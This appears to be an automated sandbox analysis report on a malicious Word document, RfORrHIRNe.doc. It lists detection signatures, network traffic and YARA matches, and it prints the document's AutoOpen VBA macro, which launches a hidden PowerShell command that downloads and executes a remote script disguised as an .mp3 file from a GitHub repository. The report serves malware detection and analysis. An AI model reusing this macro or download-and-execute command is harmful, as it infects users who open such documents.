Windows Analysis Report RfORrHIRNe

Overview

General Information

Sample Name: RfORrHIRNe (renamed file extension from none to doc)
Analysis ID: 515215
MD5: 955d5d2855b291a3cf1fc6655bbbbb79
SHA1: b58901cf8967310228bc6e4c224b2cfaf014bc65
SHA256: 63acfd6633bf3fe6462d8de72904338e2a97392654d8b39a97d18b9e7f3b25b8
Infos:

Most interesting Screenshot:

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Document contains an embedded VBA macro which may execute processes
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Stores large binary data to the registry
Document contains an embedded VBA macro which executes code when the document is opened / closed
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains no OLE stream with summary information
Sigma detected: PowerShell Download from URL
Potential document exploit detected (unknown TCP traffic)
Document contains embedded VBA macros
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: RfORrHIRNe.doc Virustotal: Detection: 49% Perma Link
Antivirus / Scanner detection for submitted sample
Source: RfORrHIRNe.doc Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMP Avira: detection malicious, Label: HEUR/Macro.Downloader.MRQR.Gen
Machine Learning detection for sample
Source: RfORrHIRNe.doc Joe Sandbox ML: detected

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: github.com
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 140.82.121.3:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 140.82.121.3:443

Networking:

barindex
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/main/5.mp3 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1Host: github.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox View IP Address: 140.82.121.3 140.82.121.3
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443
Source: powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000001.00000002.418391747.000000000031B000.00000004.00000020.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000001.00000002.424410847.000000001B7D1000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000001.00000002.422084505.0000000003603000.00000004.00000001.sdmp String found in binary or memory: http://github.co
Source: powershell.exe, 00000001.00000002.422084505.0000000003603000.00000004.00000001.sdmp String found in binary or memory: http://github.com
Source: powershell.exe, 00000001.00000002.422084505.0000000003603000.00000004.00000001.sdmp String found in binary or memory: http://github.com/ssbb36
Source: powershell.exe, 00000001.00000002.422084505.0000000003603000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp String found in binary or memory: http://github.com/ssbb36/stv/raw
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp String found in binary or memory: http://github.com/ssbb36/stv/raw/main/2.mp3
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp String found in binary or memory: http://github.com/ssbb36/stv/raw/main/2.mp3PE
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp String found in binary or memory: http://github.com/ssbb36/stv/raw/main/3.mp3
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp String found in binary or memory: http://github.com/ssbb36/stv/raw/main/3.mp3PE
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp String found in binary or memory: http://github.com/ssbb36/stv/raw/main/4.mp3
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp String found in binary or memory: http://github.com/ssbb36/stv/raw/main/4.mp3PE
Source: RfORrHIRNe.doc, ~DFA094A62AA4BA8959.TMP.0.dr String found in binary or memory: http://github.com/ssbb36/stv/raw/main/5.mp3
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp String found in binary or memory: http://github.com/ssbb36/stv/raw/main/5.mp3PE
Source: powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000001.00000002.425190058.000000001CEB7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000001.00000002.425190058.000000001CEB7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000001.00000002.424410847.000000001B7D1000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000001.00000002.418391747.000000000031B000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000001.00000002.418738530.0000000002360000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000001.00000002.425190058.000000001CEB7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000001.00000002.425190058.000000001CEB7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000001.00000002.418738530.0000000002360000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000001.00000002.425190058.000000001CEB7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000001.00000002.418333433.000000000028E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://wT
Source: powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp String found in binary or memory: https://github.c
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp String found in binary or memory: https://github.com
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp String found in binary or memory: https://github.com/ssbb3
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp String found in binary or memory: https://github.com/ssbb36/stv/ra
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp String found in binary or memory: https://github.com/ssbb36/stv/raw/main/1.mp3
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp String found in binary or memory: https://github.com/ssbb36/stv/raw/main/1.mp3PE
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp String found in binary or memory: https://github.com/ssbb36/stv/raw/main/5.mp3
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp String found in binary or memory: https://notebooks.githubusercontent.com
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubuserco
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp String found in binary or memory: https://render.githubusercontent.com
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp String found in binary or memory: https://viewscreen.githubusercontent.com
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BC62BE70-F984-485F-A938-51B492D77752}.tmp Jump to behavior
Source: unknown DNS traffic detected: queries for: github.com
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/main/5.mp3 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1Host: github.comConnection: Keep-Alive

System Summary:

barindex
Document contains an embedded VBA macro which may execute processes
Source: ~DFA094A62AA4BA8959.TMP.0.dr OLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
Document contains an embedded VBA macro with suspicious strings
Source: RfORrHIRNe.doc OLE, VBA macro line: Shell ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')")
Source: VBA code instrumentation OLE, VBA macro: Module NewMacros, Function Autoopen, String powershell: Shell ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')") Name: Autoopen
Source: ~DFA094A62AA4BA8959.TMP.0.dr OLE, VBA macro line: JbxHook_Shell_1_ 3, ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')")
Yara signature match
Source: RfORrHIRNe.doc, type: SAMPLE Matched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: RfORrHIRNe.doc, type: SAMPLE Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: 00000001.00000002.418320805.0000000000250000.00000004.00000020.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp, type: DROPPED Matched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp, type: DROPPED Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMP, type: DROPPED Matched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMP, type: DROPPED Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Document has an unknown application name
Source: ~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp.0.dr OLE indicator application name: unknown
Source: ~DFA094A62AA4BA8959.TMP.0.dr OLE indicator application name: unknown
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: RfORrHIRNe.doc OLE, VBA macro line: Sub Autoopen()
Source: VBA code instrumentation OLE, VBA macro: Module NewMacros, Function Autoopen Name: Autoopen
Source: ~DFA094A62AA4BA8959.TMP.0.dr OLE, VBA macro line: Sub Autoopen()
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: ~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFA094A62AA4BA8959.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Document contains no OLE stream with summary information
Source: ~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp.0.dr OLE indicator has summary info: false
Source: ~DFA094A62AA4BA8959.TMP.0.dr OLE indicator has summary info: false
Document contains embedded VBA macros
Source: RfORrHIRNe.doc OLE indicator, VBA macros: true
Source: ~DFA094A62AA4BA8959.TMP.0.dr OLE indicator, VBA macros: true
Source: RfORrHIRNe.doc Virustotal: Detection: 49%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................#...............................................`I.........v.....................K...................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................Sj.... #..............................}..v.....#......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../...............P.Sj....P.W.............................}..v....h*......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................Sj.... +..............................}..v.....+......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;...............P.Sj....P.W.............................}..v.....1......0.......................~....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................Sj.....1..............................}..v....@2......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.......A.t. .l.i.n.e.:.2. .c.h.a.r.:.1.8...............}..v....P6......0.................W....."....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................Sj.....7..............................}..v.....7......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S...............P.Sj....P.W.............................}..v....P>......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S.................Sj.....?..............................}..v.....?......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.......u.t.F.i.l.e. .".t.e.m.p.5.4.6.8.5.".............}..v.....C......0.................W.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.................Sj....PD..............................}..v.....D......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k...............P.Sj....P.W.............................}..v.....K......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k.................Sj....PL..............................}..v.....L......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....w....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n......Q......0.................W.....4....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....w.................Sj.....Q..............................}..v....8R......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................P.Sj....P.W.............................}..v....xW......0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj....0X..............................}..v.....X......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .......P.Sj....P.W.............................}..v....@\......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj.....\..............................}..v....x]......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .................By............................. .................................................x............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj....p%..............................}..v.....%......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................P.Sj....P.W.............................}..v.....,......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj....p-..............................}..v.....-......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................P.Sj....P.W.............................}..v....X3......0.......................~....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj.....4..............................}..v.....4......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3. .c.h.a.r.:.1.8...............}..v.....8......0.................W....."....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj....X9..............................}..v.....9......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................P.Sj....P.W.............................}..v.....@......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj....XA..............................}..v.....A......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............O.u.t.F.i.l.e. .".e.n.d...v.b.s."...............}..v.....E......0.................W....."....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj.....F..............................}..v.... G......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................P.Sj....P.W.............................}..v.....M......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj.....N..............................}..v.... O......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....PS......0.................W.....4....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj.....T..............................}..v.....T......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................P.Sj....P.W.............................}..v.....Y......0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj.....Z..............................}..v.....[......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .......P.Sj....P.W.............................}..v.....^......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj....H_..............................}..v....._......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#...............P.Sj....P.W.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................Sj....H...............................}..v............0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../...............P.Sj....P.W.............................}..v.....$......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................Sj....H%..............................}..v.....%......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;...............P.Sj....P.W.............................}..v....0+......0.......................~....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................Sj.....+..............................}..v....h,......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.......A.t. .l.i.n.e.:.4. .c.h.a.r.:.1.8...............}..v....x0......0.................W....."....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................Sj....01..............................}..v.....1......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S...............P.Sj....P.W.............................}..v....x8......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S.................Sj....09..............................}..v.....9......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.......u.t.F.i.l.e. .".h.s.t.a.r.t...v.b.s."...........}..v.....=......0.................W.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.................Sj.....>..............................}..v.....?......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k...............P.Sj....P.W.............................}..v.....E......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k.................Sj.....F..............................}..v.....G......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....w....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....0K......0.................W.....4....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....w.................Sj.....K..............................}..v....hL......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................P.Sj....P.W.............................}..v.....Q......0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj....`R..............................}..v.....R......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .......P.Sj....P.W.............................}..v....pV......0.................W............................. Jump to behavior
